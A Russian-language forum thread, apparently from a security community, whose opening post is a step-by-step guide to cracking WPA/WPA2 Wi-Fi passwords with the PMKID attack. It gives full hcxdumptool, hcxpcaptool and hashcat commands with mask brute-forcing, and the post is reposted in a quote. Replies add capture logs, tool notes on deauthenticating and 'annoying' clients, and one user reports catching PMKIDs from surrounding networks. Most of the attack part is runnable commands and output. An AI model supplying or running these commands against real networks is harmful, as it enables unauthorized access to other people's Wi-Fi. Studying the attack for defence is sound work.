• 🚨 Ещё можно успеть на курс «OSINT: технология боевой разведки» от Академии Кодебай

    🔍 Изучите методы разведки с использованием открытых источников (OSINT) для проведения успешных атак.
    🛠️ Освойте ключевые инструменты, такие как Maltego, TheHarvester и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальную разведку.
    🧠 Развивайте навыки, которые помогут вам стать экспертом в области информационной безопасности.

    Запись открыта до 23 мая Подробнее о курсе ...

Статья Новый способ взлома Wi-Fi | август 2018

Всем огромный привет, дорогие форумчане. В этой статье я хотел бы рассказать о новом способе взлома пароля к сети Wi-Fi.

Протокол WPA/WPA2 морально и физически устарел, и всё уже давно идет к тому что этот протокол пора обновить! И одним из таких ключевых толчков, стала опубликованная уязвимость в октябре 2017г Mathy Vanhoef, в протоколе WPA2, которая получила название key reinstallation attack ( ). Конечно же, дыры прикрыли где смогли, но именно с этого момента началась разработка нового протокола шифрования WPA3 и
уже во всю проводит испытания нового протокола на потенциальные проблемы в протоколе, в рамках которого как раз и был выявлен новый вектор атаки на протокол WPA/WPA2.

Суть метода заключается в том что Вы можете получить идентификатор PMKID (Pairwise Master Key Identifier) в составе ответа EAPOL на запрос аутентификации (PMKID указывается в опциональном поле RSN IE (Robust Security Network Information Element)).

Наличие PMKID позволяет определить разделяемый ключ PSK (Pre-Shared Key, пароль к беспроводной сети) без непосредственного получения вычисленного на его основе PMK (Pairwise Master Key), передаваемого на этапе согласования соединения при успешной аутентификации нового пользователя. Основная разница этой атаки от существующих, в том что нет необходимости захватывать полное "рукопожатие", а достаточно одного кадра EOPOL, ну второе не менне важное - это то что нет необходимости ждать пользователя который подключиться к атакуемой сети, так как атака будет происходить непосредственно на саму AP.


И так для проведения атаки нам будет необходимо:
  1. Linux (в моем случае Linux parrot 4.16.0-parrot16-amd64)
  2. hcxtools
  3. hcxdumptool
  4. Hashcat v4.2.0
Для начала пройдемся по загрузке и установке:

Hcxtools (аналогично и для hcxdumptool)
  1. git clone ZerBea/hcxtools
  2. cd hcxtools
  3. make
  4. make install
Hashcat v4.2.0

Даже если у Вас уже установлен hashcat, но он ниже версии 4.2.0, то Вам нужно будет его удалить, затем скачать свежую версию и установить, как и я это делал, ну или обновить другим известным для Вас способом т.к. в старых версиях нет метода расшифровки PMKID для WPA/WPA2 (а именно 16800).
  1. git clone hashcat/hashcat
  2. cd hashcat
  3. make
  4. make install * (пояснения внизу)
Всю атаку я буду проводить на своем роутере. Марка Asus RT-N12C1. Прошивка последняя.

I. Переводим наш беспроводной интерфейс в режим монитора:
1 способ
Код:
airmon-ng start wlan0 (wlan0 - это Ваш интерфейс, посмотреть можно введя команду ifconfig)
airmon-ng check kill
2 способ
Код:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng check kill
II. Запускаем сканирование Wi-Fi сетей
airodump wlan0mon (wlan0 в зависимости от того каким способом пользовались)
мой тестовый Wi-Fi называется "Happy_New_Year"

1.png


Сохраняем BSSID нашей тестовой AP БЕЗ ДВОЕТОЧИЙ в файл... я это сделал следующей командой:

Код:
echo "60A44C55D7C0" > filter.txt
III. Запускаем Hcxdumptool
hcxdumptool -i wlan0 -o hash --filterlist=filter.txt --filtermode=2 --enable_status=1 , где
-i wlan0 -имя нашего сетевого интерфейса
-o hash - выходной файл в pcapng формате в котором есть строка PMKID с хешем
--filtermode=2 - указываем что наш filter.txt будет целевым списком
--filterlist=filter.txt - файл с BSSID который мы Вы сохранили
--enable_status=1 - включаем сообщения по маске ( EAPOL,PROBEREQUEST,AUTHENTICATON или ASSOCIATION )

3.png


после получения сообщения "FOUND PMKID" мы останавливаем работу скрипта, и как вы можете заметить мне пришло аж сразу 3 сообщения о найденных пакетах в которм содержится строка с хешем PMKID. И так, Hcxdumptool справился со своей задачей и нашел нужный пакет с хешем... идем дальше!:cool::cool::cool:


IV Запускаем hcxpcaptool

hcxpcaptool -z hash_crack hash ,где
-z hash_crack - выходной файл, с хешем PMKID очищенной от лишней инфы, для hashcat (hashmod -m 16800). преобразован в обычный текст.
hash - файл в pcapng формате (все собранные пакеты hcxdumptool)

4.png


В моем случае он обнаружил 3 пакета, как я уже говорил, и все данные записал в мой текстовый файл hash_crack..... в 3 строки. Как раз эти строки мы и будем расшифровывать в HASHCAT

5.png


V. Запускаем HASHCAT

hashcat -m 16800 -a 3 -w 3 hash_crack '?u?s?d23456A' --force ,где хочу только пояснить
-m 16800 - новый hashmod который появился в версии 4.2.0
?u?s?d?d?d?d?d6A - мой пароль по маске + 2 последних символа которых я знаю из этого пароля

7.png


1 день и 4 часа:eek: проверять я конечно же не буду!), но я добавил ее пару известных символов и перезапустил... вот результат...

8.png


пароль был успешно найден)))))

Вывод из всего этого могу сделать только один.... данный метод на голову выше своих предыдущих вариантов атаки, к тому же я посмотрел на скорость которая хоть и не намного выше чем в aircrack-ng, но все же, а если учесть то что у некоторых есть хорошие видеокарты, то это вообще отличное подспорье! к тому же нет больше необходимости ждать юзверя и перехватывать "рукопожатие" + этих скриптов в том что можно это все делать не на одной точке а на нескольких одновременно... добавив в первичный текстовый файл BSSID разных AP.


З.Ы. Трудности с которыми я столкнулся:
  1. наверно единственная была маленькая проблема при переустановке hashcat. После удаления (apt-get remove hashcat), перешел в папку свежескачанного скрипта.....
  2. make
  3. make install
и тут мне выдает ошибку - "include/ext_OpenCL.h:15:10: fatal error: CL/cl.h: No such file or directory #include <CL/cl.h>" , мол нет какой-то папки....так и правильно у меня в принципе не было OpenGL....так что порыскав, в течении пару минут нашел решение - apt-get install opencl-headers, после чего hashcat благополучно заработал!

На этом спешу откланяться!) Всем спасибо!
 
Для всех Debian'щиков на armhf64, ну т.е. на Raspberry Pi 3 Rev. B+ и им подобным не забудьте вот это, иначе при установке через SSH система виснет.
sudo apt install ocl-icd-libopencl1 git build-essential
 
При установке не было ошибок? Я так и не смог установить без ошибок на kali linux 2018.2
Чего то не хватает, файлов библиотек, а без правильной установки никаких PMKID не поймает, хотя показывает работу, как будто ищет и такие же сообщения про хэндшейк.
В итоге установкой файлов библиотек загубил систему, теперь буду пробовать на виртуальной машине.

Конечно, у меня были ошибки, я об этом написал в своём первом сообщении, что не просто было всё установить на моей убунту 18. И я готов подсказать, как тебе всё заинсталлить, но только надо знать какие именно у тебя ошибки, а то я не запоминал все сложности с которым столкнулся.
 
Конечно, у меня были ошибки, я об этом написал в своём первом сообщении, что не просто было всё установить на моей убунту 18. И я готов подсказать, как тебе всё заинсталлить, но только надо знать какие именно у тебя ошибки, а то я не запоминал все сложности с которым столкнулся.
Разочаровался в этом новом способе, не буду его дальше тестить. Установил без ошибок на виртуальный wifislax, но PMKID по прежнему не ловится. Надеялся новый способ хоть и долгий из-за слабости наших видеокарт с hachcat, но может он поможет с залоченными точками, но оказалось нет смысла, никаких выгод он не дает и непонятно по какому принципу ловит этот неуловимый PMKID, в смысле, что за особые условия должны для этого быть.
Что касаемо ошибок, то их много, устранишь одну, появляется другая. Пробовал установить на другие kali Linux, более старые версии, но все равно везде ошибки, видимо kali не заточена под новый способ, какой бы релиз не использовал. :)
 
Я столкнулся с такими проблемами как - отсутствует папки bild, не хватает файлов типа OpenGLL, pcap.h, openssl, zlib.h и тд и тп
Проблемы все решаются простым обновлением системы и если:
Нет папки bild - установить kernel headers и linux headers для вашего ядра
Нет файла OpenGLL или openssl и тд и тп - apt-cache search <название недостоющего файла>, искать типа dev (Например "libghc-curl-dev" ) и все элементрано установить
Мне помогло, все запустилось, надеюсь кому-нибудь помог
 
  • Нравится
Реакции: dark2strike
А вы что думали? В сказку попали? Никто вам под всякие Wi-Fi слаки не будет собирать этот инструмент. Его создатели с форума hashcat, а там в ходу Kali Linux. Даже на Kali надо несколько доп. программ установить. Вообще ТС не умеет обращаться с поиском, уже делали оф. тему по новой атаке, где обсудили установку, ошибки и т.д. Привет любителям общаться сразу в 2-3 темах.
Новая атака на WPA/WPA2/WPA3-PSK с использованием PMKID
 
А вы что думали? В сказку попали? Никто вам под всякие Wi-Fi слаки не будет собирать этот инструмент. Его создатели с форума hashcat, а там в ходу Kali Linux. Даже на Kali надо несколько доп. программ установить. Вообще ТС не умеет обращаться с поиском, уже делали оф. тему по новой атаке, где обсудили установку, ошибки и т.д. Привет любителям общаться сразу в 2-3 темах.
Новая атака на WPA/WPA2/WPA3-PSK с использованием PMKID
Вот как раз наоборот на wifislax все встало без всяких проблем, то что нужно для ловли PMKID. xashcat не хочет устанавливаться, но это наверно исправимо. Вчера за пару часов поймал несколько PMKID, некоторые вообще сразу, а другие в течении 10 минут. Ловил там, где есть клиенты, сегодня попробую другие.
P_2.jpg
 
  • Нравится
Реакции: yarr
Вот как раз наоборот на wifislax все встало без всяких проблем, то что нужно для ловли PMKID. xashcat не хочет устанавливаться, но это наверно исправимо. Вчера за пару часов поймал несколько PMKID, некоторые вообще сразу, а другие в течении 10 минут. Ловил там, где есть клиенты, сегодня попробую другие.
Посмотреть вложение 21570
Ну значит с руками у Вас проблем нет. Насчет Hashcat - я не знаю есть ли он в репо слаки или Вы его ставили из исходников. Если с сайта качаете, то там еще неск. программ нужны типа hashcat-utils и т.д.
 
Ну значит с руками у Вас проблем нет. Насчет Hashcat - я не знаю есть ли он в репо слаки или Вы его ставили из исходников. Если с сайта качаете, то там еще неск. программ нужны типа hashcat-utils и т.д.
Спасибо. Что нибудь придумаем, главное есть файлы PMKID, а куда их засунуть найдем! :)
 
Вроде без клиентов не захватить PMKID.
Что здесь, что на Ачате бред какой-то пишут (про то что нельзя без клиентов поймать PMKID).
Атака позволяет захватывать PMKID в 2 случаях - когда у точки уже есть клиент, если его нет скрипт сам выполнит пробное подключение.

+еще шейки иногда ловит, надо только их попробовать извлечь из файла.

Вот сейчас еще раз все проверил - в начале атаки скрипт нам показывает MAC нашего фейкового клиента:

root@yarr:~# hcxdumptool -o test1.pcapng -i wlan1 --enable_status=1

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1
FILTERLIST...............: 0 entries
MAC CLIENT...............: f0a225XXXXXX (client)
MAC ACCESS POINT.........: 00238XXXXXX (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63545
ANONCE...................: d5a4547b0e4c344f7a6273737878ba314680c6e9ea139fde4cfaa9073b8dfd11

[17:16:11 - 001] b4a5efXXXXXX -> f0a225XXXXXXX [FOUND PMKID CLIENT-LESS]
[17:16:12 - 001] fcc897XXXXXX -> f0a225XXXXXX [FOUND PMKID CLIENT-LESS] ------->>> это мы получили с 1 ТД 2 PMKID (наш фейк клиент и реальный) и 1 HENDSHAKE
[17:16:12 - 001] fcc897XXXXXX -> 64a651XXXXXX [FOUND PMKID]
[17:16:12 - 001] fcc897XXXXXX -> 64a651XXXXXX [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 34896]
[17:16:57 - 006] 6c3b6bXXXXXX -> f0a225XXXXXX [FOUND PMKID CLIENT-LESS]
[17:17:23 - 003] 78312bXXXXXX -> f0a225XXXXXX [FOUND PMKID CLIENT-LESS]
[17:17:47 - 013] a039eeXXXXXX -> f0a225XXXXXX [FOUND PMKID CLIENT-LESS]
[17:18:32 - 003] cc4eecXXXXXX -> 8c3ae3XXXXXX [FOUND PMKID]
[17:18:39 - 007] fcc897XXXXXX-> 40490fXXXXXX [FOUND PMKID]
INFO: cha=2, rx=14304, rx(dropped)=4491, tx=2130, powned=9, err=0

FOUND PMKID-LESS - нашел с помощью пробного подключения, там нет клиентов или скрипт по каким-то причинам их не обнаружил.
FOUND PMKID - нашел с помощью клиента на точке.
FOUND AUTHORIZED HANDSHAKE - сабж.

Я параллельно airodump-ng чекал клиентов, все верно. И эти клиенты совпадают со значениями в логе.

К тому же те, кто следят за веткой на форуме hashcat и так прекрасно понимают что не всегда нужен клиент на уязвимых точках. + В оригинальной статье это прямым текстом сказано.

Вот немного про атаки от автора инструмента
hcxdumptool is able to run different attack vectors. And the client-less (PMKID) attack vector is only one of them:

ap-less:
Only one packet (M2) from a client required. You do not need to hunt for access points. Just wait until the clients come to you. Have patience - some clients will give you their PSK in the clear (hcxpcaptool -E -I -U)!
This attack vector is the most important one, because clients are weak! Try to annoy them!
You can run --nonce-error-corrections=0 on that handshake!

client-less:
Only one packet (M1 - PMKID) from an access point is required.
You have to hunt for access points (usually access points don't move). It's hard to annoy an access point.
You need to have a good antenna (high gain)!

m4 - retry:
After receipt of a single M4, M1, M2, M3 are requested as long as we didn't successfull captured an authorized handshake (M2/M3).
A client and an access point are required for this attack vector! You need to have a good antenna!

deauthentication (old school):
Disconnect a client from the network and capture the following authentication.
A client and an access point are required for this attack vector!
You need to have a good antenna (high gain)!
Attack vector will not work if PMF is enabled


Possible reason why you didn't receive a PMKID:
No access point with activated roaming is in range.

But so what:
A client is in range - play with him!
Там есть опции для максимальной скрытности от WIDS, + сейчас вендоры роутеров внедрют технологию защиты от DOS атак.
 
Последнее редактирование:
Пока не установим CUDA, все это не имеет смысла, скорость перебора слишком маленькая, пароль на 8 цифр надо целый день хреначить с моей видеокартой. Легче хендшейки использовать и программу на винде Distributed Password Recovery, с ней 8 цифр за полтора часа найдутся. Надо попробовать файл hash ей скормить.
 
7990 числовой на 8 символов за примерно 10 мин перебирает, как правило быстрее
 
Всем огромный привет, дорогие форумчане. В этой статье я хотел бы рассказать о новом способе взлома пароля к сети Wi-Fi.

Протокол WPA/WPA2 морально и физически устарел, и всё уже давно идет к тому что этот протокол пора обновить! И одним из таких ключевых толчков, стала опубликованная уязвимость в октябре 2017г Mathy Vanhoef, в протоколе WPA2, которая получила название key reinstallation attack ( ). Конечно же, дыры прикрыли где смогли, но именно с этого момента началась разработка нового протокола шифрования WPA3 и уже во всю проводит испытания нового протокола на потенциальные проблемы в протоколе, в рамках которого как раз и был выявлен новый вектор атаки на протокол WPA/WPA2.

Суть метода заключается в том что Вы можете получить идентификатор PMKID (Pairwise Master Key Identifier) в составе ответа EAPOL на запрос аутентификации (PMKID указывается в опциональном поле RSN IE (Robust Security Network Information Element)).
Наличие PMKID позволяет определить разделяемый ключ PSK (Pre-Shared Key, пароль к беспроводной сети) без непосредственного получения вычисленного на его основе PMK (Pairwise Master Key), передаваемого на этапе согласования соединения при успешной аутентификации нового пользователя. Основная разница этой атаки от существующих, в том что нет необходимости захватывать полное "рукопожатие", а достаточно одного кадра EOPOL, ну второе не менне важное - это то что нет необходимости ждать пользователя который подключиться к атакуемой сети, так как атака будет происходить непосредственно на саму AP.


И так для проведения атаки нам будет необходимо:
  1. Linux (в моем случае Linux parrot 4.16.0-parrot16-amd64)
  2. hcxtools
  3. hcxdumptool
  4. Hashcat v4.2.0
Для начала пройдемся по загрузке и установке:

Hcxtools (аналогично и для hcxdumptool)
  1. git clone ZerBea/hcxtools
  2. cd hcxtools
  3. make
  4. make install
Hashcat v4.2.0

Даже если у Вас уже установлен hashcat, но он ниже версии 4.2.0, то Вам нужно будет его удалить, затем скачать свежую версию и установить, как и я это делал, ну или обновить другим известным для Вас способом т.к. в старых версиях нет метода расшифровки PMKID для WPA/WPA2 (а именно 16800).
  1. git clone hashcat/hashcat
  2. cd hashcat
  3. make
  4. make install * (пояснения внизу)
Всю атаку я буду проводить на своем роутере. Марка Asus RT-N12C1. Прошивка последняя.

I. Переводим наш беспроводной интерфейс в режим монитора:
1 способ
Код:
airmon-ng start wlan0 (wlan0 - это Ваш интерфейс, посмотреть можно введя команду ifconfig)
airmon-ng check kill
2 способ
Код:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng check kill
II. Запускаем сканирование Wi-Fi сетей
airodump wlan0mon (wlan0 в зависимости от того каким способом пользовались)
мой тестовый Wi-Fi называется "Happy_New_Year"


Посмотреть вложение 21243

Сохраняем BSSID нашей тестовой AP БЕЗ ДВОЕТОЧИЙ в файл... я это сделал следующей командой:
Код:
echo "60A44C55D7C0" > filter.txt
III. Запускаем Hcxdumptool
hcxdumptool -i wlan0 -o hash --filterlist=filter.txt --filtermode=2 --enable_status=1 , где
-i wlan0 -имя нашего сетевого интерфейса
-o hash - выходной файл в pcapng формате в котором есть строка PMKID с хешем
--filtermode=2 - указываем что наш filter.txt будет целевым списком
--filterlist=filter.txt - файл с BSSID который мы Вы сохранили
--enable_status=1 - включаем сообщения по маске ( EAPOL,PROBEREQUEST,AUTHENTICATON или ASSOCIATION )


Посмотреть вложение 21247

после получения сообщения "FOUND PMKID" мы останавливаем работу скрипта, и как вы можете заметить мне пришло аж сразу 3 сообщения о найденных пакетах в которм содержится строка с хешем PMKID. И так, Hcxdumptool справился со своей задачей и нашел нужный пакет с хешем... идем дальше!:cool::cool::cool:

IV Запускаем hcxpcaptool

hcxpcaptool -z hash_crack hash ,где
-z hash_crack - выходной файл, с хешем PMKID очищенной от лишней инфы, для hashcat (hashmod -m 16800). преобразован в обычный текст.
hash - файл в pcapng формате (все собранные пакеты hcxdumptool)


Посмотреть вложение 21250

В моем случае он обнаружил 3 пакета, как я уже говорил, и все данные записал в мой текстовый файл hash_crack..... в 3 строки. Как раз эти строки мы и будем расшифровывать в HASHCAT

Посмотреть вложение 21251

V. Запускаем HASHCAT

hashcat -m 16800 -a 3 -w 3 hash_crack '?u?s?d23456A' --force ,где хочу только пояснить
-m 16800 - новый hashmod который появился в версии 4.2.0
?u?s?d?d?d?d?d6A - мой пароль по маске + 2 последних символа которых я знаю из этого пароля


Посмотреть вложение 21252

1 день и 4 часа:eek: проверять я конечно же не буду!), но я добавил ее пару известных символов и перезапустил... вот результат...

Посмотреть вложение 21253

пароль был успешно найден)))))

Вывод из всего этого могу сделать только один.... данный метод на голову выше своих предыдущих вариантов атаки, к тому же я посмотрел на скорость которая хоть и не намного выше чем в aircrack-ng, но все же, а если учесть то что у некоторых есть хорошие видеокарты, то это вообще отличное подспорье! к тому же нет больше необходимости ждать юзверя и перехватывать "рукопожатие" + этих скриптов в том что можно это все делать не на одной точке а на нескольких одновременно... добавив в первичный текстовый файл BSSID разных AP.

З.Ы. Трудности с которыми я столкнулся:

1. наверно единственная была маленькая проблема при переустановке hashcat. После удаления (apt-get remove hashcat), перешел в папку свежескачанного скрипта.....
1. make
2. make install
и тут мне выдает ошибку - "include/ext_OpenCL.h:15:10: fatal error: CL/cl.h: No such file or directory #include <CL/cl.h>" , мол нет какой-то папки....так и правильно у меня в принципе не было OpenGL....так что порыскав, в течении пару минут нашел решение - apt-get install opencl-headers, после чего hashcat благополучно заработал!


На этом спешу откланяться!) Всем спасибо!
паррот у тя конечно не красивый... а статья хорошая...
 
Пока не установим CUDA, все это не имеет смысла, скорость перебора слишком маленькая, пароль на 8 цифр надо целый день хреначить с моей видеокартой. Легче хендшейки использовать и программу на винде Distributed Password Recovery, с ней 8 цифр за полтора часа найдутся. Надо попробовать файл hash ей скормить.
А какой программой под ubuntu 18 или вин 8.1 лучше пользоваться для раскрытия потенциала карт 1070Ti?
 
  • Нравится
Реакции: DBJ
Похупай ртх новый и тогда за 5 мин сбрутить))
 
А какой программой под ubuntu 18 или вин 8.1 лучше пользоваться для раскрытия потенциала карт 1070Ti?
Вообще насколько я понимаю лучше видеокарту для перебора пароля иметь RADEON, а ваша GeForce, поэтому можно попробовать на этой мощной игровой карте на любом windows программу Distributed Password Recovery и использовать хендшейк. Мне кажется скорость будет приличной.
Лет 5 назад я хотел видеокарту ATI RADEON 6990 - 3000 шейдеров, 165.000 WPA паролей в секунду, но теперь наверное есть что то получше.
Одним словом нужен RADEON в котором как можно больше микропроцессоров.
Мне удалось достичь при установке на kali Linux проприетарного драйвера скрости 24000 паролей в секунду, с видеокартой NVIDIA GeForse GTX 660.
 
А какой программой под ubuntu 18 или вин 8.1 лучше пользоваться для раскрытия потенциала карт 1070Ti?
Хорошая видеокарта, о такой только мечтать многим приходится. Согласно графику третье место.
 
Мне удалось достичь при установке на kali Linux проприетарного драйвера скрости 24000 паролей в секунду, с видеокартой NVIDIA GeForse GTX 660.
У меня такая же видеокарта, но на старом хешкате скорость была 48 000, на новом не знаю не ставил.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD